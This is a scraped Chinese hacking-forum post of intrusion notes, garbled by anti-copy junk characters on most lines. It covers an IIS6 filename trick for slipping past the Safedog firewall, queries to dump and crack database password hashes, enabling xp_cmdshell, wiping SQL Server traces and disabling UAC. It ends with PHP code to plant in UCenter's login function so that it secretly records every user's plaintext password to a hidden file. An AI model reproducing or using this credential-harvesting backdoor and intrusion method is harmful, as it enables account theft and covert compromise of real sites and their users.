; V# Z7 R/ p; E* l" Y利用II6文件解析漏洞绕过安全狗代码:
. m9 e$ J6 U4 u; x/ L;antian365.asp;antian365.jpg
) a$ M% ^: E) @! @; M. G+ K" _+ E$ r
6 C+ ^, g4 T; H3 `: i* W1 F各种类型数据库抓HASH破解最高权限密码!6 x6 P5 P% h2 N& ~, P" |9 \, k
1.sql server2000
8 e1 v( Z9 C; ?2 w% _- W" FSELECT password from master.dbo.sysxlogins where name='sa'% R& u6 K% h$ J3 u
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341* E, S6 p- S% @% |
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A7 @) p& V* s- n+ p% X1 B. c8 p
x. w% U! Y+ B. ?0×0100- constant header3 S. t9 {2 X9 b9 g5 i
34767D5C- salt
2 w" c h) @0 y( s" B6 w s0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash v9 ~" f3 u- g- i! @! C3 z) M: P
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash2 e. K! z+ I+ p" t% _+ S% k3 }
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash& z2 N ]* d8 S# ]! W; n
SQL server 2005:-
3 l) l) T% @6 s0 P, ?; W6 Y1 zSELECT password_hash FROM sys.sql_logins where name='sa'
5 N& m6 M) ^6 |0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
2 b$ T# h" W. t3 S- q0×0100- constant header
3 ]; ~* x' f# g. T E' _993BF231-salt5 p: F/ r$ O+ y! R2 D7 L
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; `: r7 a+ }3 }% C0 @9 wcrack case sensitive hash in cain, try brute force and dictionary based attacks.0 n6 T# G/ u8 }; k4 y
0 e9 x: u Z9 }/ E' Uupdate:- following bernardo’s comments:-7 C; y& s7 K7 \# k
use function fn_varbintohexstr() to cast password in a hex string.
& x! k5 g! e& k N0 r- `2 ie.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
: y/ G7 |" f; S; t6 m/ M: m$ j0 A3 ]4 D: t; }
MYSQL:-
' U& n6 T% \. X' p6 }8 u
- H; q8 r1 N' l( a2 ]In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
3 {0 R/ \/ g6 x( l% `' A" U! s+ N$ D9 ~ H* [9 |" s7 q- e
*mysql < 4.1
" |- t% e/ X: e4 ?$ r; S, X. R0 ~
mysql> SELECT PASSWORD(‘mypass’);: t7 |/ v6 t& a
+——————–+2 L, n% O/ _' G& P9 u1 F
| PASSWORD(‘mypass’) |4 m7 P/ I4 v8 M# [3 b3 ~
+——————–+; X7 f$ t- f% \' c
| 6f8c114b58f2ce9e |
7 G7 O2 c: M- Y) X% O/ H+——————–+
/ ~- X. t+ C& a* }! B. d' z9 B1 T. |' q7 G3 Y5 t1 F0 f
*mysql >=4.1$ S( |3 q( q! R' q: H' A
: Z9 Y8 @4 {- ~# q N( |6 [
mysql> SELECT PASSWORD(‘mypass’);1 u% C, w/ H6 E0 q3 D) m# t) z
+——————————————-+
% T% s x( ^. w4 I/ f. m( r& V| PASSWORD(‘mypass’) |8 O3 n7 o- b+ ?$ Z- d, K
+——————————————-+, u! R; G a- b
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
7 ^! ?* b3 B; F* ~0 y/ j. x+——————————————-+
& j# h! m# _: q" A* B# |2 {% w7 X# w9 V$ U) W, B
Select user, password from mysql.user8 ?8 s0 F- J# }6 G0 q* e
The hashes can be cracked in ‘cain and abel’
* S1 w+ N0 k7 X: P6 y6 w
# v( s- B+ }( K4 `% jPostgres:-
% Z1 G. k; c" x0 ]9 f. E- k* H% E: C& NPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
; l* V# n" J$ L" k# G7 |1 q* L: pselect usename, passwd from pg_shadow;7 V7 `$ a0 c" E5 x# K. \6 Q
usename | passwd
' P) }! N* y4 w% O7 `——————+————————————-
/ i. J1 h& K7 X b; @, f) ~3 q2 Htestuser | md5fabb6d7172aadfda4753bf0507ed43960 N- D' v" m7 ~4 R: E6 D/ K
use mdcrack to crack these hashes:- x! F9 z7 U+ g- h& @7 E
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396. W9 D+ |" o$ D G5 m5 u
7 I$ [! V: r/ m" @- C8 P7 Y9 m
Oracle:-3 ~% f' B3 H4 l8 l- [) Y1 q$ l
select name, password, spare4 from sys.user$
1 V5 d# [7 {, H( R* I1 l: Ehashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
; p- O/ K$ N! G; O# eMore on Oracle later, i am a bit bored….9 E- V; E2 q' S% Q. O, i0 L
+ ?4 I! c. \, L( [
1 F V" k' Z+ R
在sql server2005/2008中开启xp_cmdshell
/ H% Y p: V: x+ \-- To allow advanced options to be changed.% ~* A, _) s' q2 Z* _
EXEC sp_configure 'show advanced options', 1( J- C, ?9 J/ C! ^* D1 F, a
GO
) F$ J* Q9 u2 n. ~. B& Z5 R5 v4 C-- To update the currently configured value for advanced options.
8 H7 D: y* [( Z& wRECONFIGURE
( f- m* ~7 E$ O8 x9 wGO
2 S, ~" u. u! B$ ~+ I, }# g' Z-- To enable the feature.
% ~$ e4 ^: i- x; Z3 B! l+ D6 Y+ }2 ?EXEC sp_configure 'xp_cmdshell', 1& X; f# `4 t1 D! x0 B: d& X4 q
GO
V( R' }% i. d9 M7 ^+ G* D-- To update the currently configured value for this feature.
3 V5 |0 ~! Z* _0 z/ W5 d2 zRECONFIGURE6 m$ [$ u6 ~* ]2 _5 b: J
GO
' O0 E" B [4 W) HSQL 2008 server日志清除,在清楚前一定要备份。
& f/ E- E( e/ Q) z/ U( _$ q X如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
( X5 W2 T2 H; e* `2 rX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
: _7 h1 V% ]2 \# f1 K. M
& e) K6 ^: c5 k. w5 c对于SQL Server 2008以前的版本:
8 ~# X, ]+ v* R# q: C2 ySQL Server 2005:
, ^0 U; R- s# N/ k! T) h) B删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat0 S' Q" @+ \1 t: G1 W
SQL Server 2000:
4 c8 h P5 }0 a" H$ }清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
3 U6 T. X& ?% O `/ n2 Z
3 ^5 E' i2 f' { o' T本帖最后由 simeon 于 2013-1-3 09:51 编辑2 W* m3 s& |& g$ P4 b# H
5 B8 g# ]1 A5 d* O& F2 }! y2 ~+ n/ f: C. @9 |. N" I, f/ {) j3 h* ~' N. z
windows 2008 文件权限修改7 |! o: v/ e% }0 ?4 n* {. ^7 n3 Y0 J
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
, p* O5 x4 G: G% t2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
* R5 Y2 d) \+ r x一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
' g6 z4 C2 [$ |* @' s/ i
8 |# e" T# H# z0 H: b8 MWindows Registry Editor Version 5.00
, I2 j" f* \& b. J* F; U[HKEY_CLASSES_ROOT\*\shell\runas]) @: ]2 u( y1 s7 h0 t. B2 M
@="管理员取得所有权"
) u+ }% a1 X8 T! P7 S"NoWorkingDirectory"=""$ s: L* c# L5 \0 p6 H0 h
[HKEY_CLASSES_ROOT\*\shell\runas\command]
3 ^7 o8 w9 f; P, o& N- m, v@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": |% ~$ v( s2 O& x5 o% _
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& c; S. R$ X2 q
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
# z9 e# V" M& W@="管理员取得所有权"
% G, S9 w6 @2 ]7 B' R4 \"NoWorkingDirectory"=""
8 K4 C) L* @. N! R# j[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
0 Q! f3 o+ A- J4 }8 ~8 P6 |@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. ~; N6 I* E! L/ H# _/ D"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" d- E5 _; [* C# @. F
4 D9 `+ Q3 w; R2 ^1 K5 j[HKEY_CLASSES_ROOT\Directory\shell\runas]
) c' o; i- l4 x@="管理员取得所有权"( [0 H: U/ \/ e% }6 V
"NoWorkingDirectory"=""+ u+ `% L+ e+ m4 f
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]6 ?1 ^" q; ^8 U, Z8 Z" |
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
# v" {: Q s# |4 D) F6 T"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
. @* z9 L$ W: a2 w* [
- b1 m% M6 b+ e9 W2 T6 P5 R
$ h. N$ c4 ^4 H/ u4 G! @5 B& dwin7右键“管理员取得所有权”.reg导入, j/ a% Y; G3 M
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,- d, g9 b. T P; z
1、C:\Windows这个路径的“notepad.exe”不需要替换4 c2 k/ @5 x& y- ^/ d) g/ f
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换! |+ x7 `8 b1 J0 X( n# A( E# A
3、四个“notepad.exe.mui”不要管$ y: ?( M) B" ]+ T& R7 c( {# N
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
. r7 G; o+ n, ~- A, h3 @# m* QC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”6 ~0 N) _5 \# Q# Y
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,/ A' n6 t& u+ v% K& V' a
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。# N9 Q" b' m$ x! H& g5 n4 T
windows 2008中关闭安全策略: 2 v5 S& [. x: \
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0 R$ {3 s. y7 p4 P修改uc_client目录下的client.php 在
+ A& n4 y3 F, r. f' R. qfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {" ^( ]3 K5 v8 p7 h
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
/ W, y. A7 g2 F6 c0 l你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw) v; H* K( ?! V7 K" _
if(getenv('HTTP_CLIENT_IP')) {
4 Q6 p4 J8 h: d0 i( F7 N# u$onlineip = getenv('HTTP_CLIENT_IP');
, m+ u! Y( X' n2 d1 p6 j% h K$ U} elseif(getenv('HTTP_X_FORWARDED_FOR')) {7 A3 Z! a9 C/ a' w" p
$onlineip = getenv('HTTP_X_FORWARDED_FOR');3 l$ I' u+ c3 `5 Y- t& P" {3 c
} elseif(getenv('REMOTE_ADDR')) {
$ a1 y5 {7 p- w* k$onlineip = getenv('REMOTE_ADDR');$ w! p9 f0 O. V
} else {7 j( r5 f" e! v% T) F& v
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];1 G2 h0 r" h9 |& W1 i# C- a
}+ p7 v# C+ q& W2 w" ^
$showtime=date("Y-m-d H:i:s"); y1 m {$ j- M+ \8 U+ p0 V3 K! j
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";: O6 g. O, e O7 u5 F ], F
$handle=fopen('./data/cache/csslog.php','a+');: j8 O! a5 P" N9 u5 i
$write=fwrite($handle,$record); |